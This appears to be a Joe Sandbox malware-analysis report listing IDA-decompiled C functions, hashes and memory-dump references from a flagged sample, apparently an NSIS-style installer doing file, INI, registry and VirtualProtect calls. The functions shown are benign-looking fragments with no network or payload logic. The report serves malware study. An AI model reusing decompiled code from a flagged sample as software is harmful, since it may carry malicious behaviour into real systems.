                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FilePointerwsprintf
                                                    • String ID:
                                                    • API String ID: 327478801-0
                                                    • Opcode ID: 5f1d525169d9ce6b4f9467462e39e8872e382c374fce7961deb580ad00958b0a
                                                    • Instruction ID: 360c63f9489f710495f37cc3b83494bffb267c36335a31cc71ff2527b59642b3
                                                    • Opcode Fuzzy Hash: 5f1d525169d9ce6b4f9467462e39e8872e382c374fce7961deb580ad00958b0a
                                                    • Instruction Fuzzy Hash: 18E06571A00104EBD711DBA4AE45CAE7379DF00308711883BF102B40D1CAB94D529A2D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040230C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040230C(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402C53(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
					_t13 = E00402C53(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
					_t11 = E00402C53(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C53(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}







                                                    0x0040230c
                                                    0x0040230c
                                                    0x0040230e
                                                    0x00402312
                                                    0x00402315
                                                    0x0040231a
                                                    0x0040231f
                                                    0x00402328
                                                    0x00402328
                                                    0x0040232d
                                                    0x00402336
                                                    0x00402336
                                                    0x00402343
                                                    0x004015b4
                                                    0x004015b6
                                                    0x004028a1
                                                    0x004028a1
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileStringWrite
                                                    • String ID:
                                                    • API String ID: 390214022-0
                                                    • Opcode ID: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                                    • Instruction ID: 442d6135041436e14d88d5d309934ead45877352a2168de0e76fd2d1165917bb
                                                    • Opcode Fuzzy Hash: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                                    • Instruction Fuzzy Hash: 3FE086319085B66BE71036F10F8DABF10589B44385B14057FB612B71C3D9FC4D8242AD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00401735() {
				long _t5;
				WCHAR* _t8;
				WCHAR* _t12;
				void* _t14;
				long _t17;

				_t5 = SearchPathW(_t8, E00402C53(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t12 = _t8;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}








                                                    0x00401749
                                                    0x0040174f
                                                    0x00401751
                                                    0x0040286f
                                                    0x00402876
                                                    0x00402876
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: PathSearch
                                                    • String ID:
                                                    • API String ID: 2203818243-0
                                                    • Opcode ID: d41ad826040998f1cd72f3ecb79750585a48af9d8656ecc770dd3af47c83ea59
                                                    • Instruction ID: d8de68dbe72b960966570827fcf7b95eaea009d5ef273339483d93543a2671c7
                                                    • Opcode Fuzzy Hash: d41ad826040998f1cd72f3ecb79750585a48af9d8656ecc770dd3af47c83ea59
                                                    • Instruction Fuzzy Hash: 9BE0D872300100ABD710DB64DE48AAA3398DF0036CF20853AE602A60C0D6B48A41873D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402D5D Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00402D5D(void* __eflags, void* _a4) {
				short* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t8 = E00402C53(0x22);
				_t9 =  *0x40cdd8; // 0x19e35c
				_t3 = _t9 + 4; // 0x529
				_t11 = RegOpenKeyExW(E00402D48( *_t3), _t8, 0,  *0x42a2f0 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}






                                                    0x00402d71
                                                    0x00402d77
                                                    0x00402d7c
                                                    0x00402d85
                                                    0x00402d8d
                                                    0x00402d95

                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000529,00000000,00000022,00000000,?,?), ref: 00402D85
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Open
                                                    • String ID:
                                                    • API String ID: 71445658-0
                                                    • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                    • Instruction ID: 508f16f0b04c5eadc0d806ad76faca1178dd72643dd16b9b94500f6ee76514f5
                                                    • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                    • Instruction Fuzzy Hash: 12E04F76280108ABDB00EFA4EE46ED537DCAB14740F008021B608D70A1C674E5509768
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405E6A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00405E6A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                    0x00405e6e
                                                    0x00405e7e
                                                    0x00405e86
                                                    0x00000000
                                                    0x00405e8d
                                                    0x00000000
                                                    0x00405e8f

                                                    APIs
                                                    • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,004033FF,0040A230,0040A230,00403303,00414ED0,00004000,?,00000000,004031AD), ref: 00405E7E
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                    • Instruction ID: 5673304fef1064f236b213ef723108cd0aff19b739320a24e8caa41491261f20
                                                    • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                    • Instruction Fuzzy Hash: 27E0B63661025ABBDF109F65DC00AAB7B6CFB05260F048436BA55E6190E635E9219AE4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405E99 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00405E99(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                    0x00405e9d
                                                    0x00405ead
                                                    0x00405eb5
                                                    0x00000000
                                                    0x00405ebc
                                                    0x00000000
                                                    0x00405ebe

                                                    APIs
                                                    • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040F919,0040CED0,00403383,0040CED0,0040F919,00414ED0,00004000,?,00000000,004031AD,00000004), ref: 00405EAD
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                    • Instruction ID: 98d10028cd881ca52753e47c7ca342dd4640a312c7922d7b1eeb81aac27e7924
                                                    • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                    • Instruction Fuzzy Hash: 41E0EC3226065AABDF109F55DC00EEB7F6CEB053A1F048836FD55E2190D631EA62DBE4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 100027C7 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
					 *0x1000405c = 0xc2;
					 *0x1000404c = 0;
					 *0x10004054 = 0;
					 *0x10004068 = 0;
					 *0x10004058 = 0;
					 *0x10004050 = 0;
					 *0x10004060 = 0;
					 *0x1000405e = 0;
				}
				return 1;
			}



                                                    0x100027d0
                                                    0x100027d5
                                                    0x100027e5
                                                    0x100027ed
                                                    0x100027f4
                                                    0x100027f9
                                                    0x100027fe
                                                    0x10002803
                                                    0x10002808
                                                    0x1000280d
                                                    0x10002812
                                                    0x10002812
                                                    0x1000281a

                                                    APIs
                                                    • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39674247886.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000001.00000002.39674168804.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674313518.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674359830.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                    • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                    • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                    • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040234E Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040234E(short __ebx) {
				short _t7;
				WCHAR* _t8;
				WCHAR* _t19;
				void* _t21;
				void* _t24;

				_t7 =  *0x40a010; // 0xa
				 *(_t21 + 8) = _t7;
				_t8 = E00402C53(1);
				 *(_t21 - 0x50) = E00402C53(0x12);
				GetPrivateProfileStringW(_t8,  *(_t21 - 0x50), _t21 + 8, _t19, 0x3ff, E00402C53(0xffffffdd)); // executed
				_t24 =  *_t19 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t19 = __ebx;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}








                                                    0x0040234e
                                                    0x00402355
                                                    0x00402358
                                                    0x00402368
                                                    0x0040237f
                                                    0x00402385
                                                    0x00401751
                                                    0x0040286f
                                                    0x00402876
                                                    0x00402876
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileString
                                                    • String ID:
                                                    • API String ID: 1096422788-0
                                                    • Opcode ID: a0c645cdae85ff89f3910aa28bd6119042b2c01797eb2224224bfadf122582d4
                                                    • Instruction ID: dd75bc0ae23c3a1c44a4da6173f6571f456224c800c03a06d022cc4bf2e9b606
                                                    • Opcode Fuzzy Hash: a0c645cdae85ff89f3910aa28bd6119042b2c01797eb2224224bfadf122582d4
                                                    • Instruction Fuzzy Hash: C2E04F30804259AAEB00BFE0DE09AED3B68AF00384F10443AF640AB0D1E7F8C5829749
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C53(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                    0x004015ae
                                                    0x004015b4
                                                    0x004015b6
                                                    0x004028a1
                                                    0x004028a1
                                                    0x00402ade
                                                    0x00402aea

                                                    APIs
                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 6a56edba13b9c2337be9c3321b9b7e2366901d178b3ab9994b13267431536a99
                                                    • Instruction ID: c23ad3d9d814670b9e5664e680d4ed6fd6c27bb1f69e79231988cb8a8a550e85
                                                    • Opcode Fuzzy Hash: 6a56edba13b9c2337be9c3321b9b7e2366901d178b3ab9994b13267431536a99
                                                    • Instruction Fuzzy Hash: CCD01232704104D7DB10DBA4AB4869D73A1EB40369B218577D602F21D0D6B9CA919B29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403402 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00403402(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                    0x00403410
                                                    0x00403416

                                                    APIs
                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                    • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                    • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                    • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040430B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040430B(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a248, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                    0x00404319
                                                    0x0040431f

                                                    APIs
                                                    • SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                    • Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
                                                    • Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                    • Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}




                                                    0x10001225
                                                    0x1000122b

                                                    APIs
                                                    • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39674247886.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000001.00000002.39674168804.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674313518.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.39674359830.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AllocGlobal
                                                    • String ID:
                                                    • API String ID: 3761449716-0
                                                    • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                    • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
